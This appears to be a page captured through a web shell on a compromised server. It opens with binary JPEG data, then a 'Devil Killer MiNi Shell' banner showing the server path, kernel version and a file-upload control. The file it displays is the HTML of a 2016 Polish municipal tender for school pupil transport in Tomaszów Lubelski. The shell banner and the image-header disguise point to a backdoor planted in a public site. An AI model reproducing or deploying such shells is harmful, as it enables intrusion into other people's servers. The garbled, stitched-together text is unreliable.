JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20160707/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20160707/124639-N-2016.html

<p class="kh_header"><b>Tomaszów Lubelski: Świadczenie usług w zakresie przewozu uczniów z miejsca zamieszkania
do placówek oświatowych prowadzonych przez Gminę Tomaszów Lubelski  
w roku szkolnym 2016/201</b><br>
<b>Numer ogłoszenia: 124639 - 2016; data zamieszczenia: 07.07.2016</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b>
<!--zamówienia publicznego.</p>-->
<table class="text2">
<tr><td style="border: solid 1px; width:15px black; text-align: center;"><b>V</b></td>
<td>zamówienia publicznego</td></tr>
<tr><td style="border: solid 1px; width:15px black; text-align: center;"></td>
<td>zawarcia umowy ramowej</td></tr>
<tr><td style="border: solid 1px; width:15px black; text-align: center;"></td>
<td>ustanowienia dynamicznego systemu zakupów (DSZ)</td></tr>
</table>


<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Urząd Gminy Tomaszów Lubelski , ul. 29 Listopada 9, 22-600 Tomaszów Lubelski, woj. lubelskie, tel. 084 6643085, faks 084 6643873.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.tomaszowlubelski.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Świadczenie usług w zakresie przewozu uczniów z miejsca zamieszkania
do placówek oświatowych prowadzonych przez Gminę Tomaszów Lubelski  
w roku szkolnym 2016/201.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> 1. Przedmiotem zamówienia  jest realizacja zadania pod nazwą:Świadczenie usług 
w zakresie przewozu uczniów z miejsca zamieszkania do placówek oświatowych prowadzonych przez Gminę Tomaszów Lubelski w roku szkolnym 2016/2017  które obejmuje świadczenie usług przewozowych taborem  przystosowanym do usług transportu zbiorowego w celu dowiezienia uczniów z miejsca zamieszkania do szkoły i ze szkoły do miejsca zamieszkania ucznia i  zapewnienia opieki uczniom w czasie przejazdu na wyznaczonych trasach.
2.  Zamówienie będzie realizowane w roku szkolnym 2016/2017 z wykluczeniem dni wolnych od zajęć szkolnych, we wszystkie dni nauki szkolnej tzn. usługa świadczona będzie w dni powszednie z wyjątkiem świąt i innych dni ustawowo wolnych od pracy, 
a także przerw w realizacji zajęć dydaktyczno-wychowawczych, określonych na podstawie przepisów Rozporządzenia Ministra Edukacji Narodowej i Sportu z dnia 
18 kwietnia 2002 r. w sprawie organizacji roku szkolnego Dz..U. z 2002 r. Nr 46, poz.432 ze zm. (ferie zimowe, wiosenna i zimowa przerwa świąteczna, dni ustawowo wolne od pracy).
3.  W przypadku zmian w organizacji zajęć polegających na: skróceniu godzin nauki, egzaminu gimnazjalnego, rekolekcji, odpracowywania dni nauki w innych terminach, święta szkolne lub innych przyczyn Wykonawca zostanie powiadomiony przez Zamawiającego o zmianie terminu dowozu i/lub odwozu uczniów co najmniej na
1 dzień przed planowaną zmianą.
4. Realizacja przedmiotu zamówienia w roku szkolnym 2016/2017 od 01.09.2016 roku do 30.06.2017 roku)
5. Ogółem szacunkowa liczba dowożonych uczniów będzie wynosić 328 osób.
Liczbę uczniów podano wg stanu na miesiąc czerwiec 2016 roku na podstawie informacji złożonych przez dyrektorów szkół oraz podań rodziców.
Ilości podane wyżej mogą ulec zmianie w zależności od decyzji rodziców dot. wyboru szkoły oraz formy dowozu uczniów.
6.  Zamawiający zastrzega sobie prawo do zmiany ilości przewożonych uczniów 
   o 10 %, a Wykonawcy nie będą przysługiwały z tego tytułu żadne roszczenia 
      finansowe wobec Zamawiającego.

5. Dodatkowe informacje w zakresie zamówienia publicznego:
1) Usługi muszą być świadczone środkami transportu spełniającymi wymagania techniczne określone w przepisach ustawy z dnia 20 czerwca 1997 r.- Prawo 
o ruchu drogowym (Dz. U. z 2012 r.,  poz. 1137 z późn. zm.), Rozporządzenia Ministra Infrastruktury z 31.12.2002 (Dz. U. Z 2015 r.,poz. 305 ze zm.) w sprawie warunków technicznych pojazdów oraz zakresu niezbędnego wyposażenia oraz § 36 rozporządzenia Ministra Infrastruktury z dnia 22 lipca 2002r. w sprawie rejestracji 
i oznaczania pojazdów ( Dz. U. z 2014r., poz. 1522 z późn. zm.) 
2) W celu spełnienia wymogów bezpieczeństwa Wykonawca do realizacji niniejszego zamówienia winien dysponować środkami transportu o ilości miejsc siedzących wystarczających dla dzieci szkolnych wskazanych liczbowo na poszczególnych trasach.
3) W przypadkach awarii pojazdu lub innych okoliczności uniemożliwiających przewóz dzieci, leżących po stronie Wykonawcy,Wykonawca zobowiązuje się do niezwłocznego podstawienia innego autobusu lub zmiany kierowcy celem kontynuowania przewozu.
4) Wykonawca zobowiązany jest zapewnić przewóz uczniów zgodnie z rozkładem jazdy ustalonym przez Zamawiającego i opracowanym wspólnie z dyrektorami szkół na początku roku szkolnego 2016/2017 oraz dostosowanym do planu lekcji uczniów korzystających z dowozu.
5) Wszystkie dzieci muszą być przywiezione do szkół najpóźniej na 10 minut przed rozpoczęciem zajęć lekcyjnych  Godziny dowozu muszą umożliwiać dowożonym uczniom punktualne rozpoczęcie zajęć lekcyjnych. Zamawiający zastrzega sobie możliwość zmian w wykazie, w takim przypadku Zamawiający w porozumieniu 
z dyrektorami poszczególnych placówek oświatowych poinformuje Wykonawcę 
o potrzebie wprowadzenia zmian.
6) Wykonawca ponosi pełną odpowiedzialność za bezpieczeństwo przewożonych dzieci i uczniów w związku z tym zobowiązany jest ubezpieczyć dzieci i uczniów od następstw nieszczęśliwych wypadków (NW) na własny koszt. 
7) Wykonawca zobowiązany jest do przestrzegania wszystkich wymogów prawnych dotyczących przewozów dzieci szkolnych oraz zapewnienia im właściwej opieki. Wykonawca musi zapewnić uczniom bezpieczny przewóz, tzn. odpowiednie warunki bezpieczeństwa i higieny. Dowożenie dzieci ma się odbywać ubezpieczonymi autobusami posiadającymi aktualne przeglądy techniczne. Wykonawca ubezpiecza autobusy i pasażerów od wszelkich szkód powstałych podczas przewozu oraz pozostających w związku z przewozem.
6.         Zakres zamówienia obejmuje:
1) Przewóz uczniów (dowóz do szkół i odwóz do miejsca zamieszkania) na podstawie sprzedanych biletów miesięcznych. Wykonawca musi posiadać zezwolenia na wykonywanie regularnych przewozów.
2) Wykonawca ponosi wszelkie koszty związane z utrzymaniem i obsługą pojazdu np. wynagrodzenia kierowców,wynagrodzenie opiekuna,zakup paliwa, utrzymanie 
w czystości pojazdów, ubezpieczenie OC i NW,przeglądy techniczne,wszelkie naprawy,inne niezbędne koszty eksploatacyjne,itp.
3) Obsługę autobusu stanowić będzie kierowca z uprawnieniami oraz opiekun, który zapewni dzieciom bezpieczne wsiadanie do środka transportu,opiekę nad uczniami 
w czasie przewozu, dojazd do właściwego przystanku oraz bezpieczne wysiadanie 
w miejscu przeznaczenia. Szczegółowy zakres czynności świadczonych przez opiekuna w czasie dowozu/odwozu stanowi załącznik do nr 1 do umowy.Opieka nad dziećmi w czasie przewozu w środkach transportu będzie zapewniona przez Wykonawcę z wyjątkiem trasy od nr 1 do nr 5, gdzie opiekę zapewni Zamawiający. Przystankiem wyjazdowym i docelowym dla opiekunów będzie miasto Tomaszów Lubelski. Dane osobowe opiekunów oraz poszczególne przystanki zostaną zgłoszone Wykonawcy do dnia 03.09.2016 roku. Zamawiający nie dopuszcza, aby opiekunami w autobusach byli kierowcy. Zamawiający będzie weryfikował obecność opiekuna podczas przewozów i odwozów dokonując wyrywkowej kontroli. Kontroli dokona wyznaczony przez Zamawiającego pracownik wskazany w umowie.
W przypadku stwierdzenia jednorazowego (w danym miesiącu) braku opiekuna, Zamawiający zastosuje sankcję karną w wysokości 2% miesięcznego wynagrodzenia. W przypadku stwierdzenia dwukrotnego (w danym miesiącu) braku opiekuna Zamawiający zastosuje sankcję karną w wysokości kolejnych 6% miesięcznego wynagrodzenia. W przypadku stwierdzenia trzeciego i kolejnego (w danym miesiącu)  braku opiekuna Zamawiający zerwie umowę  ze skutkiem natychmiastowym. W przypadku, gdy Wykonawca nie zapewni dowozu lub odwozu dzieci z któregoś z przystanków (z wyjątkiem sytuacji, gdy droga powiatowa lub wojewódzka będzie zaśnieżona bądź ze względu na inne ciężkie warunki atmosferyczne nieprzejezdna), Zamawiający potrąci z faktury  kwotę równą 2,5% wysokości miesięcznego wynagrodzenia za każdy zgłoszony przypadek - zgłoszenia braku dowozu lub odwozu dokonują rodzice dzieci w terminie 3 dni od wystąpienia zdarzenia do Gminnego Zespołu Ekonomiczno-Administarcyjnego Szkół 
w Tomaszowie Lubelskim.
4) Imienna lista uczniów, dla których będą zakupione bilety na następny okres rozliczeniowy (z podziałem na poszczególne placówki oświatowe) będzie przekazywana wybranemu Wykonawcy przez Zamawiającego-przed rozpoczęciem każdego miesiąca.
5) Rozliczenia będą dokonywane w cyklu miesięcznym na podstawie zestawienia zamówionych biletów miesięcznych. Rozliczenie usługi (dowóz i odwóz dzieci na podstawie zakupionego biletu dokonywane będzie po wykonaniu całości zamówienia w cyklu miesięcznym w oparciu o zestawienie biletów.
6) Podstawą miesięcznego rozliczenia należności za wykonane usługi stanowić będzie cena jednego biletu miesięcznego podana w ofercie oraz ilość uczniów, dla których zostaną zamówione-zakupione imienne bilety, z podziałem na poszczególne placówki oświatowe7) Z przejazdu autobusem będą mogli korzystać inni pasażerowie na zasadach obowiązujących w regularnej komunikacji autobusowej w miarę wolnych miejsc w autobusie.7.    Planowane trasy przejazdów w  roku szkolnym 2016/2017
Trasa 1.Dowiezienie  dzieci i uczniów do Zespołu Szkół Publicznych im. Żołnierzy Września 1939 r. w Majdanie Górnym oraz rozwiezienie po zakończonych zajęciach lekcyjnych w relacji i godzinach wyszczególnionych w tabeli zamieszczonej w SIWZ.Łączna liczba uczniów-56,Szczegółowe informację dotyczace przystanków wyjazdowych i docelowych oraz ilości osób, godziny kursów zostały rozpisane w tabelce zamieszczonej w SIWZ.Trasa nr 2-Dowiezienie  dzieci i uczniów do Zespołu Szkół Publicznych w Łaszczówce oraz rozwiezienie po zakończonych zajęciach lekcyjnych w relacji i godzinach wyszczególnionych w tabeli zamieszczonej w SIWZ.Łaczna liczba uczniów-38.Szczegółowe informację dotyczace przystanków wyjazdowych i docelowych oraz ilości osób, godziny kursów zostały rozpisane w tabelce zamieszczonej w SIWZ.Trasa nr 3-Dowiezienie  dzieci i uczniów do Zespołu Szkół Publicznych im. Ordynacji Zamoyskiej w Sabaudii oraz rozwiezienie po zakończonych zajęciach lekcyjnych w relacji i godzinach wyszczególnionych w tabeli zamieszczonej w SIWZ.Łaczna liczba uczniow-41.Szczegółowe informację dotyczace przystanków wyjazdowych i docelowych oraz ilości osób, godziny kursów zostały rozpisane w tabelce zamieszczonej w SIWZ.Trasa nr 4-Dowiezienie  dzieci i uczniów do Zespołu Szkół Publicznych im. Marszałka Józefa Piłsudskiego w Podhorcach oraz rozwiezienie po zakończonych zajęciach lekcyjnych w relacji i godzinach wyszczególnionych w tabeli zamieszczonej w SIWZ.Łaczna liczba uczniów -90.Szczegółowe informację dotyczace przystanków wyjazdowych i docelowych oraz ilości osób, godziny kursów zostały rozpisane w tabelce zamieszczonej w SIWZ.Raz w tygodniu będzie będzie wykonywany kurs odwozu o godz. 15:40 po wyżej przedstawionych trasach. Szczegółowe ustalenia dotyczące dnia tygodnia oraz liczby odwożonych uczniów zostaną ustalone wspólnie z dyrektorem Zespołu Szkół Publicznych im. Marszałka Józefa Piłsudskiego w Podhorcach, a Wykonawcą, któremu zostanie udzielone zamówienie. Trasa nr 5-Dowiezienie  dzieci i uczniów do Szkoły Podstawowej w Pasiekach oraz rozwiezienie po zakończonych zajęciach lekcyjnych w relacji i godzinach wyszczególnionych w tabeli zamieszczonej w SIWZ.Łaczna liczba uczniów-11.Szczegółowe informację dotyczace przystanków wyjazdowych i docelowych oraz ilości osób, godziny kursów zostały rozpisane w tabelce zamieszczonej w SIWZ.Raz w tygodniu będzie wykonywany kurs odwozu o godz. 12:35 po wyżej przedstawionych trasach. Szczegółowe ustalenia dotyczące dnia tygodnia oraz liczby odwożonych uczniów zostaną ustalone wspólnie 
z dyrektorem Szkoły Podstawowej w Pasiekach, a Wykonawcą, któremu zostanie udzielone zamówienie. Trasa nr 6-Dowiezienie  dzieci i uczniów z Jezierni do Gimnazjum nr 1 im. Orląt Lwowskich w Tomaszowie Lubelskim oraz rozwiezienie po zakończonych zajęciach lekcyjnych w relacji i godzinach wyszczególnionych w tabeli zamieszczonej w SIWZ.Łaczna liczba uczniów-18.Szczegółowe informację dotyczace przystanków wyjazdowych i docelowych oraz ilości osób, godziny kursów zostały rozpisane w tabelce zamieszczonej w SIWZ.Kurs odwozu może ulec zmianie bądź będzie wykonywany dodatkowy kurs  po wyżej przedstawionej trasie. Szczegółowe ustalenia dotyczące godziny odwozu oraz liczby uczniów zostaną ustalone wspólnie 
z dyrektorem Gimnazjum im. Orląt Lwowskich w Tomaszowie Lubelskim  a Wykonawcą, któremu zostanie udzielone zamówienie.Trasa nr 7-Dowiezienie  dzieci i uczniów  z Ulów do Gimnazjum nr 1 im. Orląt Lwowskich w Tomaszowie Lubelskim oraz rozwiezienie po zakończonych zajęciach lekcyjnych w relacji i godzinach wyszczególnionych w tabeli zamieszczonej w SIWZ.Łaczna liczba uczniów-13.Szczegółowe informację dotyczace przystanków wyjazdowych i docelowych oraz ilości osób, godziny kursów zostały rozpisane w tabelce zamieszczonej w SIWZ.Kurs odwozu może ulec zmianie bądż będzie wykonywany dodatkowy kurs   po wyżej przedstawionej trasie. Szczegółowe ustalenia dotyczące godziny odwozu oraz liczby uczniów zostaną ustalone wspólnie z dyrektorem Gimnazjum im. Orląt Lwowskich w Tomaszowie Lubelskim  a Wykonawcą, któremu zostanie udzielone zamówienie.Trasa nr 8-Dowiezienie  dzieci i uczniów  z Pasiek do Gimnazjum nr 1 im. Orląt Lwowskich w Tomaszowie Lubelskim w Tomaszowie Lubelskim oraz rozwiezienie po zakończonychzajęciach lekcyjnych w relacji i godzinach wyszczególnionych w tabeli zamieszczonej w SIWZ.Łaczna liczba uczniów-30.Szczegółowe informację dotyczace przystanków wyjazdowych i docelowych oraz ilości osób, godziny kursów zostały rozpisane w tabelce zamieszczonej w SIWZ.Kurs odwozu może ulec zmianie bądż będzie wykonywany dodatkowy kurs   po wyżej przedstawionej trasie. Szczegółowe ustalenia dotyczące godziny odwozu oraz liczby uczniów zostaną ustalone wspólnie z dyrektorem Gimnazjum nr 1 im. Orląt Lwowskich w Tomaszowie Lubelskim  a Wykonawcą, któremu zostanie udzielone zamówienie.Trasa nr 9-Dowiezienie  dzieci i uczniówz Rogóźno Kolonia, Rogóźno ul.Wyzwolenia do  Gimnazjum nr 2 im. papieża Jana Pawła II  rozwiezienie po zakończonych zajęciach lekcyjnych w relacji i godzinach wyszczególnionych w tabeli zamieszczonej w SIWZ.Łaczna liczba uczniów-8.Szczegółowe informację dotyczace przystanków wyjazdowych i docelowych oraz ilości osób, godziny kursów zostały rozpisane w tabelce zamieszczonej w SIWZ.Kurs odwozu może ulec zmianie bądż będzie wykonywany dodatkowy kurs   po wyżej przedstawionej trasie. Szczegółowe ustalenia dotyczące godziny odwozu oraz liczby uczniów zostaną ustalone wspólnie 
z dyrektorem Gimnazjum  nr 2 im. Papieża Jana Pawła II w Tomaszowie Lubelskim  a Wykonawcą, któremu zostanie udzielone zamówienie.Trasa nr 10-Dowiezienie  dzieci i uczniów z Rabinówki do Gimnazjum nr 1 im. Orląt Lwowskich  w Tomaszowie Lubelskim oraz rozwiezienie po zakończonych zajęciach lekcyjnych w relacji i godzinach wyszczególnionych w tabeli zamieszczonej w SIWZ.Łaczna liczb auczniów-5.Szczegółowe informację dotyczace przystanków wyjazdowych i docelowych oraz ilości osób, godziny kursów zostały rozpisane w tabelce zamieszczonej w SIWZ.Kurs odwozu może ulec zmianie bądż będzie wykonywany dodatkowy kurs   po wyżej przedstawionej trasie. Szczegółowe ustalenia dotyczące godziny odwozu oraz liczby uczniów zostaną ustalone wspólnie 
z dyrektorem Gimnazjum nr 1 im. Orląt Lwowskich w Tomaszowie Lubelskim  a Wykonawcą, któremu zostanie udzielone zamówienie.Trasa nr 11-Dowiezienie  dzieci i uczniów z Kolonia Rogóźno, Rogóźno ul.Wyzwlenia do  Szkoły Podstawowej nr 2 im. Marszałka Józefa Piłsudskiego w Tomaszowie Lubelskim rozwiezienie po zakończonych zajęciach lekcyjnych w relacji i godzinach wyszczególnionych w tabeli zamieszczonej w SIWZ.Łaczna liczba uczniów-18.Szczegółowe informację dotyczace przystanków wyjazdowych i docelowych oraz ilości osób, godziny kursów zostały rozpisane w tabelce zamieszczonej w SIWZ.Kurs odwozu może ulec zmianie bądż będzie wykonywany dodatkowy kurs   po wyżej przedstawionej trasie. Szczegółowe ustalenia dotyczące godziny odwozu oraz liczby uczniów zostaną ustalone wspólnie z dyrektorem Szkoły Podstawowej nr 2 im. Marszałka Józefa Piłsudskiego  w Tomaszowie Lubelskim  a Wykonawcą, któremu zostanie udzielone zamówienie.

7.	Przedstawione trasy mogą ulec korekcie w wyniku zmiany opracowanych przez szkoły 	harmonogramów pracy.
8.	Podane godziny dowozu i odwozu mogą ulec zmianie. Szczegółowe ustalenia zostaną 	dokonane z dyrektorami poszczególnych placówek oświatowych a Wykonawcą, 	któremu zostanie udzielnie zamówienie.
9.	Cena, jaką Wykonawca przedstawi w ofercie za dowóz i odwóz dzieci szkolnych 	musi obejmować wszystkie koszty za okres jednego miesiąca wykonywania 	przedmiotu zamówienia..</p>
<p><b>II.1.5)
<table class="text2">
<tr><td style="border: solid 1px black; width:15px; text-align: center;"><b>&nbsp;</b></td>
<td><b>przewiduje się udzielenie zamówień uzupełniających</b></td></tr>
</table>                            
</b></p>
<ul class="kh_indent_1"><li><b>Określenie przedmiotu oraz wielkości lub zakresu zamówień uzupełniających</b></li>
<li></li></ul>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 60.13.00.00-8, 60.11.20.00-6, 60.10.00.00-9.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Rozpoczęcie: 01.09.2016.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Zamawiający nie przewiduje wniesienia wadium</p>
<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający uzna powyższy warunek za spełniony,jeżeli Wykonawca: 
posiada aktualną na dzień składania ofert licencję na podjęcie działalności gospodarczej  w zakresie objętym zamówieniem zgodnie z art.5 ust. 1 ustawy 
o transporcie drogowym z dnia 06 września 2001 r.(t.j. Z 2013 r.,poz. 1414 
z późn.zm.)</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający uzna powyższy warunek za spełniony, jeżeli Wykonawca wykaże,że 
w okresie ostatnich trzech lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wykonał lub wykonuje usługę 
w zakresie przewozów dzieci i uczniów o wartości min. 100 000,00 zł
(słownie: sto tysięcy złotych brutto) wraz z podaniem ich wartości, przedmiotu,dat wykonania i podmiotów,na rzecz których usługi zostały wykonane lub są wykonywane należycie.(załącznik nr 9 do SIWZ)
Dowodami, o których mowa wyżej mogą być:
(1) poświadczenie, z tym że w odniesieniu do nadal wykonywanych dostaw lub usług okresowych lub ciągłych poświadczenie powinno być wydane nie wcześniej niż na 3 miesiące przed upływem terminu składania ofert,
(2) oświadczenie Wykonawcy, jeżeli z uzasadnionych przyczyn o obiektywnym charakterze Wykonawca nie jest w stanie uzyskać poświadczenia, o którym mowa w ppkt (1).</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający uzna warunek za spełniony, jeżeli Wykonawca przedłoży wykaz posiadanego taboru transportowego dostępnego Wykonawcy usługi (w ilości co najmniej 10 sztuk) w celu realizacji zamówienia wraz z informacją o podstawie dysponowania tymi pojazdami. W wykazie należy uwzględnić, ilości miejsc siedzących odpowiadającym prognozowanej liczbie uczniów na danej trasie.(załącznik nr 8 do SIWZ).</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający że Wykonawca spełnia warunek dotyczący dysponowania osobami 	zdolnymi do wykonania zamówienia, jeżeli złoży oświadczenie o spełnianiu 	warunków udziału w postępowaniu o udzielenie zamówienia na podstawie art.44 	ustawy Prawo zamówień publicznych.</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający uzna warunek za spełniony, jeżeli Wykonawca przedstawi opłaconą 	polisę, a w przypadku jej braku inny dokument potwierdzający, że Wykonawca jest 	ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności 	związanej z przedmiotem zamówienia na kwotę nie mniejszą niż 100 tys. zł 	(słownie: sto tysięcy złotych).
	Wykonawca zobowiązuje się do posiadania przez cały okres obowiązywania umowy polisy ubezpieczenia od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia na kwotę minimum 100 tysięcy złotych.W przypadku, gdy przedłożona w ofercie polisa obejmuje okres krótszy od okresu świadczenia usługi.Wykonawca dołaczy do oferty oświadczenie, iż polisa zostanie przedłużona na kolejny okres nie krótszy niż do końca trwania umowy.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">potwierdzenie posiadania uprawnień do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania, w szczególności koncesje, zezwolenia lub licencje;</li>

